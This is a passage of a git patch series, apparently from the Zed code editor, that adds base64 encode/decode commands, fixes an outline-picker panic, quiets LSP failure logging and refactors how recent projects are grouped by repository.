/// diff --git a/crates/settings_content/src/settings_content.rs b/crates/settings_content/src/settings_content.rs index 02fe409c6325af..1124e2ac942605 100644 --- a/crates/settings_content/src/settings_content.rs +++ b/crates/settings_content/src/settings_content.rs @@ -647,7 +647,7 @@ pub struct GitPanelSettingsContent { pub button: Option, /// Where to dock the panel. /// - /// Default: left + /// Default: right pub dock: Option, /// Default width of the panel in pixels. /// @@ -756,7 +756,7 @@ pub struct PanelSettingsContent { pub button: Option, /// Where to dock the panel. /// - /// Default: left + /// Default: right pub dock: Option, /// Default width of the panel in pixels. /// @@ -998,7 +998,7 @@ pub struct OutlinePanelSettingsContent { pub default_width: Option, /// The position of outline panel /// - /// Default: left + /// Default: right pub dock: Option, /// Whether to show file icons in the outline panel. /// diff --git a/crates/settings_content/src/workspace.rs b/crates/settings_content/src/workspace.rs index 19e08e19f34dd1..7ff1f543c80155 100644 --- a/crates/settings_content/src/workspace.rs +++ b/crates/settings_content/src/workspace.rs @@ -705,7 +705,7 @@ pub struct ProjectPanelSettingsContent { pub default_width: Option, /// The position of project panel /// - /// Default: left + /// Default: right pub dock: Option, /// Spacing between worktree entries in the project panel. 
/// From 6c6a2d5fbefb6b9f226f2d4c3c1857587a21a3b3 Mon Sep 17 00:00:00 2001 From: Chris Kievit Date: Tue, 5 May 2026 06:36:18 +0200 Subject: [PATCH 182/231] editor: Add base64 encode/decode commands (#55361) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Adds `editor: convert to base64` and `editor: convert from base64` to the command palette. Both commands operate on the current selection, or the word under the cursor when nothing is selected. The decode command silently no-ops on invalid base64 input or non-UTF-8 decoded bytes, consistent with how other convert commands handle untransformable input. Release Notes: - Added `editor: convert to base64` and `editor: convert from base64` commands to the command palette --------- Co-authored-by: Christopher Biscardi --- Cargo.lock | 1 + crates/editor/Cargo.toml | 1 + crates/editor/src/actions.rs | 4 ++++ crates/editor/src/editor.rs | 29 ++++++++++++++++++++++++++ crates/editor/src/editor_tests.rs | 34 +++++++++++++++++++++++++++++++ crates/editor/src/element.rs | 2 ++ 6 files changed, 71 insertions(+) diff --git a/Cargo.lock b/Cargo.lock index 26c34c1fcc3184..083aeeef57b9ed 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -5467,6 +5467,7 @@ dependencies = [ "aho-corasick", "anyhow", "assets", + "base64 0.22.1", "breadcrumbs", "buffer_diff", "client", diff --git a/crates/editor/Cargo.toml b/crates/editor/Cargo.toml index c88d1d2c4cd052..813a8a9bc510f3 100644 --- a/crates/editor/Cargo.toml +++ b/crates/editor/Cargo.toml @@ -34,6 +34,7 @@ test-support = [ aho-corasick.workspace = true anyhow.workspace = true assets.workspace = true +base64.workspace = true breadcrumbs.workspace = true 
client.workspace = true clock.workspace = true diff --git a/crates/editor/src/actions.rs b/crates/editor/src/actions.rs index ccd60186523a32..01f52e7064d0b5 100644 --- a/crates/editor/src/actions.rs +++ b/crates/editor/src/actions.rs @@ -460,6 +460,10 @@ actions!( ConvertToRot13, /// Applies ROT47 cipher to selected text. ConvertToRot47, + /// Base64-encodes the selected text or word under cursor. + ConvertToBase64, + /// Base64-decodes the selected text or word under cursor. + ConvertFromBase64, /// Copies selected text to the clipboard. Copy, /// Copies selected text to the clipboard with leading/trailing whitespace trimmed. diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index ea38200cfe7686..af8d6f6ccc6931 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -13362,6 +13362,35 @@ impl Editor { }) } + pub fn convert_to_base64( + &mut self, + _: &ConvertToBase64, + window: &mut Window, + cx: &mut Context, + ) { + use base64::Engine as _; + self.manipulate_text(window, cx, |text| { + base64::engine::general_purpose::STANDARD.encode(text) + }) + } + + pub fn convert_from_base64( + &mut self, + _: &ConvertFromBase64, + window: &mut Window, + cx: &mut Context, + ) { + use base64::Engine as _; + self.manipulate_text( + window, + cx, + |text| match base64::engine::general_purpose::STANDARD.decode(text) { + Ok(bytes) => String::from_utf8(bytes).unwrap_or_else(|_| text.to_string()), + Err(_) => text.to_string(), + }, + ) + } + fn manipulate_text(&mut self, window: &mut Window, cx: &mut Context, mut callback: Fn) where Fn: FnMut(&str) -> String, diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 03f332821a8346..304f44d3c38b1b 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -6864,6 +6864,40 @@ async fn test_convert_to_sentence_case(cx: &mut TestAppContext) { "}); } +#[gpui::test] +async fn test_convert_to_base64(cx: &mut TestAppContext) { + 
init_test(cx, |_| {}); + + let mut cx = EditorTestContext::new(cx).await; + + // Encode a plain text selection + cx.set_state(indoc! {" + «helloˇ» + "}); + cx.update_editor(|e, window, cx| e.convert_to_base64(&ConvertToBase64, window, cx)); + cx.assert_editor_state(indoc! {" + «aGVsbG8=ˇ» + "}); + + // Decode a valid base64 selection + cx.set_state(indoc! {" + «aGVsbG8=ˇ» + "}); + cx.update_editor(|e, window, cx| e.convert_from_base64(&ConvertFromBase64, window, cx)); + cx.assert_editor_state(indoc! {" + «helloˇ» + "}); + + // Decode invalid base64 — should leave text unchanged + cx.set_state(indoc! {" + «not!!!ˇ» + "}); + cx.update_editor(|e, window, cx| e.convert_from_base64(&ConvertFromBase64, window, cx)); + cx.assert_editor_state(indoc! {" + «not!!!ˇ» + "}); +} + #[gpui::test] async fn test_manipulate_text(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index a8c0d443d7e0cf..9db33bb9ba7e84 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -555,6 +555,8 @@ impl EditorElement { register_action(editor, window, Editor::toggle_case); register_action(editor, window, Editor::convert_to_rot13); register_action(editor, window, Editor::convert_to_rot47); + register_action(editor, window, Editor::convert_to_base64); + register_action(editor, window, Editor::convert_from_base64); register_action(editor, window, Editor::delete_to_previous_word_start); register_action(editor, window, Editor::delete_to_previous_subword_start); register_action(editor, window, Editor::delete_to_next_word_end); From 05614d5581e142d4525a688314365b763abe0055 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Tue, 5 May 2026 07:10:46 +0200 Subject: [PATCH 183/231] outline: Fix panic due to stale outline hover selection (#55674) Fixes ZED-687 Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/outline/src/outline.rs | 76 ++++++++++++++++++++++++++++++++++- 1 file changed, 74 insertions(+), 2 deletions(-) diff --git a/crates/outline/src/outline.rs b/crates/outline/src/outline.rs index 78c4d9c148eec3..1f88c12a2b7301 100644 --- a/crates/outline/src/outline.rs +++ b/crates/outline/src/outline.rs @@ -231,10 +231,14 @@ impl OutlineViewDelegate { cx: &mut Context>, ) { + let Some(selected_match) = self.matches.get(ix) else { + self.selected_match_index = self.matches.len(); + return; + }; + self.selected_match_index = ix; - if navigate && !self.matches.is_empty() { - let selected_match = &self.matches[self.selected_match_index]; + if navigate { let outline_item = &self.outline.items[selected_match.candidate_id]; self.active_editor.update(cx, |active_editor, cx| { @@ -269,6 +273,10 @@ impl PickerDelegate for OutlineViewDelegate { self.selected_match_index } + fn can_select(&self, ix: usize, _window: &mut Window, _cx: &mut Context>) -> bool { + ix < self.matches.len() + } + fn set_selected_index( &mut self, ix: usize, @@ -704,6 +712,70 @@ mod tests { ); } + #[gpui::test] + async fn test_outline_stale_hover_index_after_matches_shrink(cx: &mut TestAppContext) { + init_test(cx); + + let mut source = String::new(); + for index in 0..69 { + source.push_str(&format!("struct Keep{index};\n")); + } + for index in 69..74 { + source.push_str(&format!("struct Drop{index};\n")); + } + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": source })) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + project.read_with(cx, |project, _| { + project.languages().add(language::rust_lang()) + }); + + let (workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = cx.read(|cx| workspace.read(cx).workspace().clone()); + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + 
project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + let _buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx) + }) + .await + .unwrap(); + + let outline_view = open_outline_view(&workspace, cx); + outline_view.read_with(cx, |outline_view, _| { + assert_eq!(outline_view.delegate.matches.len(), 74); + }); + + outline_view + .update_in(cx, |outline_view, window, cx| { + outline_view + .delegate + .update_matches("Keep".to_string(), window, cx) + }) + .await; + outline_view.read_with(cx, |outline_view, _| { + assert_eq!(outline_view.delegate.matches.len(), 69); + }); + + outline_view.update_in(cx, |outline_view, window, cx| { + outline_view.set_selected_index(73, None, false, window, cx); + }); + } + #[gpui::test] async fn test_outline_filtered_selection_prefers_first_match_on_score_ties( cx: &mut TestAppContext, From 650d19e851ed2b8cea9cbb55dc684dc5d48fa8a4 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Tue, 5 May 2026 08:57:05 +0200 Subject: [PATCH 184/231] lsp: Reduce lsp log spam for unimportant failures (#55732) Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/editor/src/lsp_ext.rs | 16 ++++++---------- crates/project/src/lsp_store.rs | 23 +++++++++++++++++------ 2 files changed, 23 insertions(+), 16 deletions(-) diff --git a/crates/editor/src/lsp_ext.rs b/crates/editor/src/lsp_ext.rs index 60f0dd305ef81a..881c14903b2aa9 100644 --- a/crates/editor/src/lsp_ext.rs +++ b/crates/editor/src/lsp_ext.rs @@ -3,9 +3,9 @@ use std::time::Duration; use crate::Editor; use collections::{HashMap, HashSet}; -use futures_lite::FutureExt as _; -use gpui::AsyncApp; +use futures::TryFutureExt; use gpui::{App, Entity, Task}; +use gpui::{AsyncApp, FutureExt}; use language::Buffer; use language::Language; use lsp::LanguageServerId; @@ -172,14 +172,10 @@ pub fn lsp_tasks( } lsp_tasks.into_iter().collect() }) - .race({ - // `lsp::DEFAULT_LSP_REQUEST_TIMEOUT` is larger than we want for the modal to open fast - let timer = cx.background_executor().timer(Duration::from_millis(200)); - async move { - timer.await; - log::info!("Timed out waiting for LSP tasks"); - Vec::new() - } + .with_timeout(Duration::from_millis(200), &cx.background_executor()) + .unwrap_or_else(|_| { + log::debug!("Timed out waiting for LSP tasks"); + Vec::new() }) .await }) diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index 01aab2be7ac039..ad3344fa25a7d7 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -4148,6 +4148,12 @@ impl SymbolLocation { } } +fn should_log_lsp_request_failure(message: &str) -> bool { + // content modified is a weird failure mode of rust-analyzer + // where requests are denied before its loaded a project + message.ends_with("content modified") || message.ends_with("server cancelled the request") +} + impl LspStore { pub fn init(client: &AnyProtoClient) { client.add_entity_request_handler(Self::handle_lsp_query); @@ -5249,8 +5255,7 @@ impl LspStore { language_server.name(), err ); - // rust-analyzer likes to error with this when its still loading up - if 
!message.ends_with("content modified") { + if should_log_lsp_request_failure(&message) { log::warn!("{message}"); } return Task::ready(Err(anyhow!(message))); @@ -5311,8 +5316,7 @@ impl LspStore { language_server.name(), err ); - // rust-analyzer likes to error with this when its still loading up - if !message.ends_with("content modified") { + if should_log_lsp_request_failure(&message) { log::warn!("{message}"); } anyhow::anyhow!(message) @@ -7561,8 +7565,15 @@ impl LspStore { ) -> Task> { let diagnostics = self.pull_diagnostics(buffer, cx); cx.spawn(async move |lsp_store, cx| { - let Some(diagnostics) = diagnostics.await.context("pulling diagnostics")? else { - return Ok(()); + let diagnostics = match diagnostics.await { + Ok(Some(diagnostics)) => diagnostics, + Ok(None) => return Ok(()), + Err(error) if should_log_lsp_request_failure(&format!("{error:#}")) => { + return Err(error).context("pulling diagnostics"); + } + // This is a weird way to suppress diagnostic failures on server side cancellation, + // we should actually retry the request here? + Err(_) => return Ok(()), }; lsp_store.update(cx, |lsp_store, cx| { if lsp_store.as_local().is_none() { From 492a340120524645ef32116de2719ae661715bec Mon Sep 17 00:00:00 2001 From: Max Brunsfeld Date: Tue, 5 May 2026 01:21:03 -0700 Subject: [PATCH 185/231] Improve grouping of worktrees by repo in recent projects (#55715) * Perform grouping even for repositories that have no main worktree * Enable grouping for remote projects * Delete entire project groups when deleting via the recent project picker Release Notes: - Fixed a bug where each linked worktree appeared as its own entry in recent projects for repositories without main worktrees - Fixed a bug where deleting projects from the recent projects sometimes appeared to have no effect. 
--- crates/agent_ui/src/thread_metadata_store.rs | 21 +- crates/agent_ui/src/threads_archive_view.rs | 52 +- crates/git/src/repository.rs | 20 - crates/project/src/git_store.rs | 11 +- crates/project/src/project.rs | 7 +- crates/project/tests/integration/git_store.rs | 29 + crates/recent_projects/src/recent_projects.rs | 119 ++- .../src/sidebar_recent_projects.rs | 61 +- crates/workspace/src/history_manager.rs | 9 +- crates/workspace/src/persistence.rs | 766 ++++++++++++++---- crates/workspace/src/persistence/model.rs | 7 + crates/workspace/src/welcome.rs | 32 +- crates/workspace/src/workspace.rs | 12 +- 13 files changed, 801 insertions(+), 345 deletions(-) diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index fee098f3760e96..2e6c3313eba11a 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -200,27 +200,30 @@ fn migrate_thread_remote_connections(cx: &mut App, migration_task: Task::default(); let mut remote_path_lists = HashMap::::default(); recent_workspaces .iter() - .filter(|(_, location, path_list, _)| { - !path_list.is_empty() && matches!(location, &SerializedWorkspaceLocation::Local) + .filter(|workspace| { + !workspace.paths.is_empty() + && matches!(workspace.location, SerializedWorkspaceLocation::Local) }) - .for_each(|(_, _, path_list, _)| { - local_path_lists.insert(path_list.clone()); + .for_each(|workspace| { + local_path_lists.insert(workspace.paths.clone()); }); - for (_, location, path_list, _) in recent_workspaces { - match location { + for workspace in recent_workspaces { + match workspace.location { SerializedWorkspaceLocation::Remote(remote_connection) - if !local_path_lists.contains(&path_list) => + if !local_path_lists.contains(&workspace.paths) => { remote_path_lists - .entry(path_list) + .entry(workspace.paths) .or_insert(remote_connection); } _ => {} diff --git a/crates/agent_ui/src/threads_archive_view.rs 
b/crates/agent_ui/src/threads_archive_view.rs index 8f124d7233b37c..8283692887601c 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -39,8 +39,8 @@ use ui_input::ErasedEditor; use util::ResultExt; use util::paths::PathExt; use workspace::{ - CloseWindow, ModalView, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceDb, - WorkspaceId, resolve_worktree_workspaces, + CloseWindow, ModalView, PathList, RecentWorkspace, SerializedWorkspaceLocation, Workspace, + WorkspaceDb, WorkspaceId, }; use zed_actions::agents_sidebar::FocusSidebarFilter; @@ -1127,7 +1127,6 @@ impl ProjectPickerModal { .await .log_err() .unwrap_or_default(); - let workspaces = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.workspaces = workspaces; @@ -1182,12 +1181,7 @@ struct ProjectPickerDelegate { archive_view: WeakEntity, current_workspace_id: Option, sibling_workspace_ids: HashSet, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, + workspaces: Vec, filtered_entries: Vec, selected_index: usize, focus_handle: FocusHandle, @@ -1332,9 +1326,10 @@ impl PickerDelegate for ProjectPickerDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, _, _))| self.is_sibling_workspace(*id)) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .filter(|(_, workspace)| self.is_sibling_workspace(workspace.workspace_id)) + .map(|(id, workspace)| { + let combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -1364,11 +1359,13 @@ impl PickerDelegate for ProjectPickerDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, _, _))| { - !self.is_current_workspace(*id) && !self.is_sibling_workspace(*id) + .filter(|(_, workspace)| { + 
!self.is_current_workspace(workspace.workspace_id) + && !self.is_sibling_workspace(workspace.workspace_id) }) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .map(|(id, workspace)| { + let combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -1406,8 +1403,8 @@ impl PickerDelegate for ProjectPickerDelegate { entries.push(ProjectPickerEntry::Header("This Window".into())); if is_empty_query { - for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() { - if self.is_sibling_workspace(*workspace_id) { + for (id, workspace) in self.workspaces.iter().enumerate() { + if self.is_sibling_workspace(workspace.workspace_id) { entries.push(ProjectPickerEntry::Workspace(StringMatch { candidate_id: id, score: 0.0, @@ -1433,9 +1430,9 @@ impl PickerDelegate for ProjectPickerDelegate { entries.push(ProjectPickerEntry::Header("Recent Projects".into())); if is_empty_query { - for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() { - if !self.is_current_workspace(*workspace_id) - && !self.is_sibling_workspace(*workspace_id) + for (id, workspace) in self.workspaces.iter().enumerate() { + if !self.is_current_workspace(workspace.workspace_id) + && !self.is_sibling_workspace(workspace.workspace_id) { entries.push(ProjectPickerEntry::Workspace(StringMatch { candidate_id: id, @@ -1468,11 +1465,11 @@ impl PickerDelegate for ProjectPickerDelegate { Some(ProjectPickerEntry::Workspace(hit)) => hit.candidate_id, _ => return, }; - let Some((_workspace_id, _location, paths, _)) = self.workspaces.get(candidate_id) else { + let Some(workspace) = self.workspaces.get(candidate_id) else { return; }; - self.update_working_directories_and_unarchive(paths.clone(), window, cx); + self.update_working_directories_and_unarchive(workspace.paths.clone(), window, cx); cx.emit(DismissEvent); } @@ -1504,9 +1501,11 @@ impl PickerDelegate for ProjectPickerDelegate { 
.into_any_element(), ), ProjectPickerEntry::Workspace(hit) => { - let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace = self.workspaces.get(hit.candidate_id)?; + let location = &workspace.location; - let ordered_paths: Vec<_> = paths + let ordered_paths: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact().to_string_lossy().to_string()) .collect(); @@ -1514,7 +1513,8 @@ impl PickerDelegate for ProjectPickerDelegate { let tooltip_path: SharedString = ordered_paths.join("\n").into(); let mut path_start_offset = 0; - let match_labels: Vec<_> = paths + let match_labels: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact()) .map(|path| { diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index 69910d706e40b7..d98e917d69ce59 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -60,26 +60,6 @@ pub const GRAPH_CHUNK_SIZE: usize = 1000; /// Default value for the `git.worktree_directory` setting. pub const DEFAULT_WORKTREE_DIRECTORY: &str = "../worktrees"; -/// Determine the original (main) repository's working directory. -/// -/// For linked worktrees, `common_dir` differs from `repository_dir` and -/// points to the main repo's `.git` directory, so we can derive the main -/// repo's working directory from it. For normal repos and submodules, -/// `common_dir` equals `repository_dir`, and the original repo is simply -/// `work_directory` itself. -pub fn original_repo_path( - work_directory: &Path, - common_dir: &Path, - repository_dir: &Path, -) -> PathBuf { - if common_dir != repository_dir { - original_repo_path_from_common_dir(common_dir) - .unwrap_or_else(|| work_directory.to_path_buf()) - } else { - work_directory.to_path_buf() - } -} - /// Given the git common directory (from `commondir()`), derive the original /// repository's working directory. 
/// diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 1e347b6af489c8..20facc32640bf9 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -7917,14 +7917,17 @@ impl Repository { } /// If `path` is a git linked worktree checkout, resolves it to the main -/// repository's working directory path. Returns `None` if `path` is a normal -/// repository, not a git repo, or if resolution fails. +/// repository's identity path. For regular linked worktrees this is the main +/// repository's working directory; for linked worktrees backed by a bare repo +/// such as `.bare`, this is the parent project directory users think of as the +/// repository root. Returns `None` if `path` is a normal repository, not a git +/// repo, or if resolution fails. /// /// Resolution works by: /// 1. Reading the `.git` file to get the `gitdir:` pointer /// 2. Following that to the worktree-specific git directory /// 3. Reading the `commondir` file to find the shared `.git` directory -/// 4. Deriving the main repo's working directory from the common dir +/// 4. 
Deriving the main repo's identity path from the common dir pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Option { let dot_git = path.join(".git"); let metadata = fs.metadata(&dot_git).await.ok()??; @@ -7941,7 +7944,7 @@ pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Opti .canonicalize(&gitdir_abs.join(commondir_content.trim())) .await .ok()?; - git::repository::original_repo_path_from_common_dir(&common_dir) + Some(repo_identity_path(&common_dir).to_path_buf()) } /// Validates that the resolved worktree directory is acceptable: diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index 7cb51d4ef8a41c..4e74c4cf1fcf40 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -108,7 +108,7 @@ pub use prettier_store::PrettierStore; use project_settings::{ProjectSettings, SettingsObserver, SettingsObserverEvent}; #[cfg(target_os = "windows")] use remote::wsl_path_to_windows_path; -use remote::{RemoteClient, RemoteConnectionOptions}; +use remote::{RemoteClient, RemoteConnectionOptions, same_remote_connection_identity}; use rpc::{ AnyProtoClient, ErrorCode, proto::{LanguageServerPromptResponse, REMOTE_SERVER_PROJECT_ID}, @@ -6226,6 +6226,11 @@ impl ProjectGroupKey { pub fn host(&self) -> Option { self.host.clone() } + + pub fn matches(&self, other: &ProjectGroupKey) -> bool { + self.paths == other.paths + && same_remote_connection_identity(self.host.as_ref(), other.host.as_ref()) + } } pub fn path_suffix(path: &Path, detail: usize) -> String { diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 2aaeb901d54b5b..3f752a279f237c 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -1666,6 +1666,35 @@ mod resolve_worktree_tests { assert_eq!(result, None); } + #[gpui::test] + async fn test_resolve_git_worktree_bare_repo_identity_path(cx: &mut 
TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/monty/.bare", + json!({ + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }), + ) + .await; + fs.insert_tree( + "/monty/feature-a", + json!({ + ".git": "gitdir: /monty/.bare/worktrees/feature-a", + "src": { "main.rs": "" } + }), + ) + .await; + + let result = + resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/monty/feature-a")).await; + assert_eq!(result, Some(PathBuf::from("/monty"))); + } + #[gpui::test] async fn test_resolve_git_worktree_no_git_returns_none(cx: &mut TestAppContext) { let fs = FakeFs::new(cx.executor()); diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index f5b5f78fd24e30..4b99ed37a38642 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -47,7 +47,7 @@ use ui::{ use util::{ResultExt, paths::PathExt}; use workspace::{ HistoryManager, ModalView, MultiWorkspace, OpenMode, OpenOptions, OpenVisible, PathList, - SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId, + RecentWorkspace, SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, with_active_or_new_workspace, }; use zed_actions::{OpenDevContainer, OpenRecent, OpenRemote}; @@ -102,13 +102,13 @@ pub async fn get_recent_projects( let filtered: Vec<_> = workspaces .into_iter() - .filter(|(id, _, _, _)| Some(*id) != current_workspace_id) - .filter(|(_, location, _, _)| matches!(location, SerializedWorkspaceLocation::Local)) + .filter(|workspace| Some(workspace.workspace_id) != current_workspace_id) + .filter(|workspace| matches!(workspace.location, SerializedWorkspaceLocation::Local)) .collect(); let mut all_paths: Vec = filtered .iter() - .flat_map(|(_, _, path_list, _)| path_list.paths().iter().cloned()) + .flat_map(|workspace| workspace.identity_paths.paths().iter().cloned()) 
.collect(); all_paths.sort(); all_paths.dedup(); @@ -121,9 +121,9 @@ pub async fn get_recent_projects( let entries: Vec = filtered .into_iter() - .map(|(workspace_id, _, path_list, timestamp)| { - let paths: Vec = path_list.paths().to_vec(); - let ordered_paths: Vec<&PathBuf> = path_list.ordered_paths().collect(); + .map(|workspace| { + let paths: Vec = workspace.paths.paths().to_vec(); + let ordered_paths: Vec<&PathBuf> = workspace.identity_paths.ordered_paths().collect(); let name = ordered_paths .iter() @@ -145,8 +145,8 @@ pub async fn get_recent_projects( name: SharedString::from(name), full_path: SharedString::from(full_path), paths, - workspace_id, - timestamp, + workspace_id: workspace.workspace_id, + timestamp: workspace.timestamp, } }) .collect(); @@ -614,7 +614,6 @@ impl RecentProjects { .await .log_err() .unwrap_or_default(); - let workspaces = workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.set_workspaces(workspaces); @@ -773,11 +772,9 @@ impl RecentProjects { if let Some(ProjectPickerEntry::RecentProject(hit)) = picker.delegate.filtered_entries.get(ix) { - if let Some((_, location, paths, _)) = - picker.delegate.workspaces.get(hit.candidate_id) - { - if matches!(location, SerializedWorkspaceLocation::Local) { - let paths_to_add = paths.paths().to_vec(); + if let Some(workspace) = picker.delegate.workspaces.get(hit.candidate_id) { + if matches!(workspace.location, SerializedWorkspaceLocation::Local) { + let paths_to_add = workspace.paths.paths().to_vec(); picker .delegate .add_paths_to_project(paths_to_add, window, cx); @@ -812,12 +809,7 @@ pub struct RecentProjectsDelegate { workspace: WeakEntity, open_folders: Vec, window_project_groups: Vec, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, + workspaces: Vec, filtered_entries: Vec, selected_index: usize, render_paths: bool, @@ 
-860,20 +852,12 @@ impl RecentProjectsDelegate { } } - pub fn set_workspaces( - &mut self, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - ) { + pub fn set_workspaces(&mut self, workspaces: Vec) { self.workspaces = workspaces; let has_non_local_recent = !self .workspaces .iter() - .all(|(_, location, _, _)| matches!(location, SerializedWorkspaceLocation::Local)); + .all(|workspace| matches!(workspace.location, SerializedWorkspaceLocation::Local)); self.has_any_non_local_projects = self.project_connection_options.is_some() || has_non_local_recent; } @@ -987,9 +971,10 @@ impl PickerDelegate for RecentProjectsDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, paths, _))| self.is_valid_recent_candidate(*id, paths, cx)) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .filter(|(_, workspace)| self.is_valid_recent_candidate(workspace, cx)) + .map(|(id, workspace)| { + let combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -1063,8 +1048,8 @@ impl PickerDelegate for RecentProjectsDelegate { entries.push(ProjectPickerEntry::Header("Recent Projects".into())); if is_empty_query { - for (id, (workspace_id, _, paths, _)) in self.workspaces.iter().enumerate() { - if self.is_valid_recent_candidate(*workspace_id, paths, cx) { + for (id, workspace) in self.workspaces.iter().enumerate() { + if self.is_valid_recent_candidate(workspace, cx) { entries.push(ProjectPickerEntry::RecentProject(StringMatch { candidate_id: id, score: 0.0, @@ -1149,20 +1134,15 @@ impl PickerDelegate for RecentProjectsDelegate { let Some(workspace) = self.workspace.upgrade() else { return; }; - let Some(( - candidate_workspace_id, - candidate_workspace_location, - candidate_workspace_paths, - _, - )) = self.workspaces.get(selected_match.candidate_id) + let Some(candidate_workspace) = self.workspaces.get(selected_match.candidate_id) else { 
return; }; let replace_current_window = self.create_new_window == secondary; - let candidate_workspace_id = *candidate_workspace_id; - let candidate_workspace_location = candidate_workspace_location.clone(); - let candidate_workspace_paths = candidate_workspace_paths.clone(); + let candidate_workspace_id = candidate_workspace.workspace_id; + let candidate_workspace_location = candidate_workspace.location.clone(); + let candidate_workspace_paths = candidate_workspace.paths.clone(); workspace.update(cx, |workspace, cx| { if workspace.database_id() == Some(candidate_workspace_id) { @@ -1497,10 +1477,13 @@ impl PickerDelegate for RecentProjectsDelegate { ) } ProjectPickerEntry::RecentProject(hit) => { - let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace = self.workspaces.get(hit.candidate_id)?; + let location = &workspace.location; + let raw_paths = &workspace.paths; + let identity_paths = &workspace.identity_paths; let is_local = matches!(location, SerializedWorkspaceLocation::Local); - let paths_to_add = paths.paths().to_vec(); - let ordered_paths: Vec<_> = paths + let paths_to_add = raw_paths.paths().to_vec(); + let ordered_paths: Vec<_> = identity_paths .ordered_paths() .map(|p| p.compact().to_string_lossy().to_string()) .collect(); @@ -1517,7 +1500,7 @@ impl PickerDelegate for RecentProjectsDelegate { }; let mut path_start_offset = 0; - let (match_labels, paths): (Vec<_>, Vec<_>) = paths + let (match_labels, paths): (Vec<_>, Vec<_>) = identity_paths .ordered_paths() .map(|p| p.compact()) .map(|path| { 